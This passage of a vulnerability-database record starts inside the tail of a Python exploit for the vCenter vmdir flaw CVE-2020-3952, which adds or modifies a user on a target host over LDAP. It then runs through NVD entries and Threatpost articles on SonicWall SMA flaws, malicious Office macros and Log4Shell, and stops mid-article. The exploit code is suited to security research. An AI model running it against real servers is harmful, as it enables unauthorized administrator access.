Please enter the new username to add [' + _sUSER + ']: ')\r\n if not sAnswer == '': _sUSER = sAnswer\r\n sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ')\r\n if not sAnswer == '': _sPASS = sAnswer\r\n else:\r\n _sIP = sys.argv[1]\r\n if len(sys.argv) >= 3:\r\n _sUSER = sys.argv[2]\r\n bAdduser = True\r\n if len(sys.argv) >= 4: _sPASS = sys.argv[3]\r\n\r\n ## MAIN\r\n print('')\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.settimeout(_iTIMEOUT)\r\n try:\r\n s.connect((_sIP,_iPORT))\r\n except:\r\n print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable')\r\n sys.exit(1)\r\n\r\n performBind(s)\r\n\r\n if bAdduser:\r\n sCode = performUserAdd(s, _sUSER, _sPASS)\r\n\r\n if not bAdduser:\r\n print('[!] Checking vulnerability')\r\n sCode, sMessage = performUserMod(s, 'Administrator', False)\r\n if sCode == b'\\x32': print('[-] This host is not vulnerable, message: ' + sMessage)\r\n else: print('[+] This host is vulnerable!')\r\n else:\r\n sCode = performUserMod(s, _sUSER)\r\n \r\n performUnbind(s)\r\n \r\n s.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2020-07-19] #", "sourceHref": "https://0day.today/exploit/34499", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-04-25T22:55:22", "description": "Pi-hole's Web interface provides a central location to manage a Pi-hole instance and review performance statistics. Prior to Pi-hole Web interface version 5.5.1, the `validDomainWildcard` preg_match filter allows a malicious character through that can be used to execute code, list directories, and overwrite sensitive files. The issue lies in the fact that one of the periods is not escaped, allowing any character to be used in its place. 
A patch for this vulnerability was released in version 5.5.1.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-04T18:15:00", "type": "cve", "title": "CVE-2021-32706", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32706"], "modified": "2022-04-25T19:55:00", "cpe": [], "id": "CVE-2021-32706", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32706", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-04-01T16:30:50", "description": "Improper neutralization of special elements in the SMA100 management interface '/cgi-bin/viewcert' POST http method allows a remote authenticated attacker to inject arbitrary commands as a 'nobody' user. 
This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-08T10:15:00", "type": "cve", "title": "CVE-2021-20039", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20039"], "modified": "2022-04-01T15:27:00", "cpe": ["cpe:/o:sonicwall:sma_210_firmware:9.0.0.11-31sv", "cpe:/o:sonicwall:sma_410_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_400_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_500v_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_400_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_210_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_410_firmware:9.0.0.11-31sv", "cpe:/o:sonicwall:sma_400_firmware:9.0.0.11-31sv", "cpe:/o:sonicwall:sma_500v_firmware:9.0.0.11-31sv", "cpe:/o:sonicwall:sma_410_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_500v_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_200_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_200_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_210_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_200_firmware:9.0.0.11-31sv"], "id": "CVE-2021-20039", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20039", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:sonicwall:sma_200_firmware:9.0.0.11-31sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_400_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:9.0.0.11-31sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_400_firmware:9.0.0.11-31sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:9.0.0.11-31sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_400_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_200_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:9.0.0.11-31sv:*:*:*:*:*:*:*"]}, {"lastseen": "2022-05-13T16:39:27", "description": "A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. 
This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-08T10:15:00", "type": "cve", "title": "CVE-2021-20038", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038"], "modified": "2022-05-13T14:54:00", "cpe": ["cpe:/o:sonicwall:sma_500v_firmware:10.2.1.2-24sv", "cpe:/o:sonicwall:sma_400_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_400_firmware:10.2.1.2-24sv", "cpe:/o:sonicwall:sma_200_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_500v_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_210_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_400_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_210_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_210_firmware:10.2.1.2-24sv", "cpe:/o:sonicwall:sma_410_firmware:10.2.1.2-24sv", "cpe:/o:sonicwall:sma_500v_firmware:10.2.0.8-37sv", "cpe:/o:sonicwall:sma_200_firmware:10.2.1.2-24sv", "cpe:/o:sonicwall:sma_200_firmware:10.2.1.1-19sv", "cpe:/o:sonicwall:sma_410_firmware:10.2.0.8-37sv", 
"cpe:/o:sonicwall:sma_410_firmware:10.2.1.1-19sv"], "id": "CVE-2021-20038", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20038", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:sonicwall:sma_400_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_200_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_200_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_400_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_400_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_410_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sma_210_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-13T16:20:19", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-10T14:15:00", "type": "cve", "title": "CVE-2020-3952", "cwe": 
["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.7"], "id": "CVE-2020-3952", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-3952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2022-01-12T01:28:02", "description": "Rapid7 has offered up more details on a SonicWall critical flaw that allows for unauthenticated remote code execution (RCE) on affected devices, noting that it arises from tweaks that the vendor made to the Apache httpd server.\n\nThe bug ([CVE-2021-20038](<https://cwe.mitre.org/data/definitions/121.html>)) is one of five vulnerabilities discovered in its series of popular network access control (NAC) system products.\n\nIn October, Rapid7 lead security researcher Jake Baines [discovered the flaws](<https://threatpost.com/critical-sonicwall-vpn-bugs-appliance-takeover/176869/>) in Sonic Wall\u2019s Secure Mobile Access (SMA) 100 series of devices, which includes SMA 200, 210, 400, 410 and 500v, he wrote in a report published Tuesday.\n\nSonic Wall\u2019s SMA 100 line provides end-to-end secure remote access to corporate resources, whether they are hosted on-premise, in the cloud or in hybrid data centers. 
The suite also offers policy-enforced access control for corporate users to applications after establishing user and device identity and trust.\n\nCVE-2021-20038 is the most critical of the flaws, with a rating of 9.8 on the Common Vulnerability Scoring System (CVSS). It\u2019s a stack buffer overflow vulnerability that an attacker can exploit to gain complete control of a device or virtual machine that\u2019s running SonicWall\u2019s NAC solution.\n\nThe flaw allows attackers to overwrite several security-critical data on an execution stack that can lead to arbitrary code execution, according to its advisory [listing](<https://cwe.mitre.org/data/definitions/121.html>) on the Common Weakness Enumeration website.\n\n\u201cThe most prominent is the stored return address, the memory address at which execution should continue once the current function is finished executing,\u201d according to the advisory. \u201cThe attacker can overwrite this value with some memory address to which the attacker also has write access, into which they place arbitrary code to be run with the full privileges of the vulnerable program.\u201d\n\n## **Exploiting the Critical Vulnerability **\n\nThe stack-based buffer overflow flaw discovered by Baines affects SonicWall SMA 100 series version: 10.2.1.1-19sv and is by far is the most dangerous for affected devices, and thus the most advantageous for attackers, he wrote.\n\nBy exploiting the issue, attackers \u201ccan get complete control of the device or virtual machine\u201d that\u2019s running the appliance, according to the report.\n\n\u201cThis can allow attackers to install malware to intercept authentication material from authorized users, or reach back into the networks protected by these devices for further attack,\u201d Baines wrote.\n\nThis week, Baines revealed that the problem in the device lies in its web server, which is \u201ca slightly modified version of the Apache httpd server,\u201d he explained in the report, shared with 
Threatpost ahead of publication.\n\nOne of the notable modifications is in the mod_cgi module (/lib/mod_cgi.so) and, specifically, a custom version of the cgi_build_command function that appends all the environment variables onto a single stack-based buffer using strcat, Baines wrote.\n\n\u201cThere is no bounds checking on this environment string buildup, so if a malicious attacker were to generate an overly long QUERY_STRING then they can overflow the stack-based buffer,\u201d he explained. This results in a crash that compromises the device, Baines wrote.\n\n\u201cTechnically, the \u2026 crash is due to an invalid read, but you can see the stack has been \nsuccessfully overwritten,\u201d he wrote. \u201cA functional exploit should be able to return to an attacker\u2019s desired address.\u201d\n\nSince edge-based NAC devices \u201care especially attractive targets for attackers,\u201d Baines said it\u2019s essential that companies with networks that use SonicWall\u2019s SMA 100 series devices in whatever form apply SonicWall\u2019s update as quickly as possible to fix the issues, Baines said.\n\n## **Reported & Fixed: Patch Now**\n\nThe other flaws discovered by Barnes were rated with CVSS severity in the range of 6.5 to 7.5. 
They include an \u201cimproper neutralization of special elements used in an OS command,\u201d or OS command injection flaw with a rating of 7.2 (CVE-2021-20039); a relative path traversal vulnerability with a rating of 6.5 (CVE-2021-20040); a loop with unreachable exit condition, or infinite loop flaw with a rating of 7.5 (CVE-2021-20041); and an unintended proxy or intermediary also known as a \u201cconfused deputy\u201d vulnerability with a rating of 6.5 (CVE-2021-20042).\n\nIn his research, Baines tested the SMA 500v firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv finding that CVE-2021-20038 and CVE-2021-20040 affect only devices running version 10.2.x, while the remaining issues affect both firmware versions.\n\nBaines reported the flaws to SonicWall and worked with the vendor to remediate the vulnerabilities over a period of about two months. On Dec. 7, SonicWall [released a security advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) and updates fixing the problems Baines had identified.\n\nHis report details each flaw and its impact and was published according to Rapid7\u2019s [vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).\n\n**_Password_**_ _**_Reset: [On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):_**_ Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. 
_**_[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)_**_ \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-11T14:09:21", "type": "threatpost", "title": "Critical SonicWall NAC Vulnerability Stems from Apache Mods", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039", "CVE-2021-20040", "CVE-2021-20041", "CVE-2021-20042"], "modified": "2022-01-11T14:09:21", "id": "THREATPOST:2A215C54591860EE16762D5DD82C504D", "href": "https://threatpost.com/sonicwall-nac-vulnerability-apache-mods/177529/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:28", "description": "Any cybersecurity attack \u2014 whether it be a breach, an incident or any form of compromise \u2014 starts with hackers getting in through the door. 
Threat actors and adversaries rely on gaining code execution on a target system which they can then leverage to do more damage\u2014a phase commonly referred to as initial access.\n\nMore often than not, the easiest way for an attacker to gain initial access is by exploiting the human vulnerability. This involves tricking an end user into taking some action that ultimately gives the threat actor more power than they had before. They lay a trap and propose a cleverly disguised lie to as many potential victims as possible. Even though a threat actor may attempt to fool a thousand users at one time, they only need _one_ to fall for the charade.\n\nThreat actors design and deliver this scheme [typically through email](<https://www.huntress.com/blog/experts-weigh-in-on-the-state-of-email-based-threats>)\u2014the easiest way to put digital content in front of any individual. In today\u2019s world, this is common language: \u201cBe careful not to fall for phishing emails.\u201d \n\nFor decades, the security industry has attempted to train users to stay vigilant against phishing emails with the boilerplate basics you have heard time and time again: \u201cLook for bad grammar or spelling mistakes,\u201d \u201cdouble-check the sending address,\u201d \u201chover over the link,\u201d etc. While these saturated lessons might help ward off the low-hanging fruit, well-crafted phishing emails from sophisticated actors may be genuinely hard to spot.\n\n## **Bait on the Lure**\n\nPhishing emails or any sort of digital deception carry similar traits, but might have different desired outcomes. 
The most [successful phishing campaigns](<https://twitter.com/HuntressLabs/status/1453077534589992961>) do three things: \n\n * Set the stage with a pretense\n * Strike fear with a threat\n * Demand action through urgency\n\nPretense typically tugs at a person\u2019s heartstrings or capitalizes on real-world threats or current events, such as the COVID-19 pandemic, taxes or elections, cryptocurrencies, or even blackmail and extortion (\u201cI have your password/I have you on webcam\u201d threats).\n\nThe overall goal of a phish, however, varies.\n\n## **Credential Harvesting**\n\nThe adversary may set up a \u201clookalike\u201d website, masquerading as a page that the user expected and intended to go to, but which instead delivers username and password combos to the threat actor when victims attempt to log in.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090603/IMG_2752.jpg>)\n\nSource: Huntress.\n\n## **Session Hijacking**\n\nThe adversary also may implant code on a staged website or HTML file, forcing the user\u2019s browser to download a file or leave behind cookies that can be used for later actions performed by the threat actor:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090608/IMG_2753.jpg>)\n\nSource: Huntress.\n\n## **Malicious File Attachments**\n\nThe adversary most often however attaches a specific file to an email, suggesting that the user download it and open it on their own volition. 
This file often masquerades as a legitimate document, but will instead execute code upon being opened.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090613/IMG_2754.jpg>)\n\nSource: Huntress.\n\nLet\u2019s turn our focus to this file-attachment attack vector\u2014specifically, malicious Microsoft Office documents, which can run code with a macro.\n\n## **Macro Malware**\n\nOne extremely common file attachment type included in phishing emails are Microsoft Office documents (like Word, PowerPoint or Excel)\u2014masquerading as innocent files that any user or employee might open on a daily basis. \n\nConsider an HR representative or a hiring manager at any company. Their legitimate job function is to receive and handle applications from interested applicants, oftentimes opening incoming emails and downloading their attachments, perhaps to view an incoming prospect\u2019s resume. \n\nMalicious Office documents, or maldocs, can execute code via macros if they are given explicit user permission. Once opened, the adversary must continue the charade and trick the user to click \u201cEnable Editing\u201d or \u201cEnable Content\u201d for a macro to run.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10091814/unnamed.jpeg>)\n\nSource: Huntress.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090618/IMG_2755.jpg>)\n\nMacro code will execute upon clicking the \u201cEnable Content\u201d via a specific function handler:\n\nSub Document_Open() \nSubstitutePage \nEnd Sub \nSub AutoOpen() \nSubstitutePage \nEnd Sub \nSub SubstitutePage() \nActiveDocument.Content.Select \nSelection.Delete \nActiveDocument.AttachedTemplate.AutoTextEntries(\u201cCandidate\u201d).Insert Where:=Selection.Range, RichText=True \nEnd Sub\n\nThe AutoOpen() or Document_Open() subroutines define the code that will run immediately once the Office document is opened or the user enables content. 
In the snippet of code above, the process to emulate \u201cdecrypting\u201d the content is shown\u2014simply switching out the original document with content that is saved in an attached template, taking advantage of another feature of Microsoft Word to hide things from the user.\n\n## **Tools of the Trade: Analysis Tactics**\n\nThere are several tools available to help threat hunters inside companies identify macros and catch them before they detonate. Here are two.\n\n### **Olevba**\n\nThis tool tends to be run on Linux as it is a Python tool. It does a nice job of finding key indicators that might set off an alarm for a threat hunter. It generates an output that gives threat researchers a chunk of macro code to see if any of that code warrants additional attention.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090629/IMG_2757.jpeg>)\n\nSource: Huntress.\n\n### **ViperMonkey**\n\nThis tool takes a different approach than Olevba. Whereas Olevba decodes back-end VBAproject.bin files in .ZIP files and generates the source code, ViperMonkey emulates VisualBasic (VB) scripts to a certain extent. It can run VB shellcode and see what it does\u2014all without posing any real harm to users. It can even bypass evasive techniques threat actors take when it comes to malicious Office documents, such as splitting up the code throughout the document to make it harder to identify. ViperMonkey can find those pieces of code and piece them together to be analyzed.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10090634/IMG_2758.jpeg>)\n\nSource: Huntress.\n\n## **The Perpetual Cyber Battle**\n\nHiding malware within Office documents is not a new trick\u2014it\u2019s just a very successful one. Despite knowing the scams and noticing the red flags, we\u2019re seeing a trend of more targeted and methodical phishing campaigns. 
And this might leave many defenders feeling like they\u2019re playing a game of whack-a-mole and reacting to the new tricks and tactics that attackers are using. But as attackers have gotten better at social engineering and finding ways to dupe users and their technology, we like to think that us defenders are certainly [rising to the challenge](<https://threatpost.com/tools-defending-phishing-attacks/176463/>) and better prepared for battle.\n\n**_John Hammond is a senior security researcher at [Huntress.](<https://www.huntress.com/>)_**\n\n**_Enjoy additional insights from Threatpost\u2019s Infosec Insiders community by visiting our [microsite](<https://threatpost.com/microsite/infosec-insiders-community/>). _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:29:27", "type": "threatpost", "title": "Next-Gen Maldocs & How to Solve the Human Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:29:27", "id": "THREATPOST:B318814572E066732E6C32CC147D95E2", "href": 
"https://threatpost.com/maldocs-malicious-office-documents-human-vulnerability/176916/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d \u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. 
And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, __co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpo__st)._\n\n_**Questions answered (click to jump to the appropriate section):**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the log4j library to log data. Because that library is almost ubiquitous in Java applications, virtually any business that has a website is highly likely to be affected. With one line of malicious code, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. 
